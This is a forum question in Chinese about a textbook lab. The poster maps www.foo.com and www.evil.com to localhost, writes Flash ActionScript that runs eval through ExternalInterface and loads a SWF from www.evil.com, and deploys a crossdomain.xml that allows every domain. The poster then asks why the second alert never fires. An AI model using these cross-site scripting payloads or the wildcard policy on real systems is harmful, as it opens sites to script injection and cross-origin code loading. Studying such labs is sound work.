小弟在做书上的一个实验
1.先在host文件中建立对应关系:127.0.0.1对应着www.foo.com与www.evil.com
2.再依次编写URL.swf,与Hello.swf代码如下
URL.swf
ExternalInterface.call("eval","alert(/xss/)");
var loader1:Loader=new Loader();
loader1.load(new URLRequest("http://www.evil.com/Hello.swf"));
Hello.swf
ExternalInterface.call("eval","alert(/Helloworld/)");
同时部署策略文件crossdomain.xml于www根目录如下
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
可当我访问http://www.foo.com/URL.swf时并没有弹出helloworld
在firefox下F12打开网络监控如下
想请教一下各位大神,为何没有执行
PS:能够访问http://www.evil.com/Hello.swf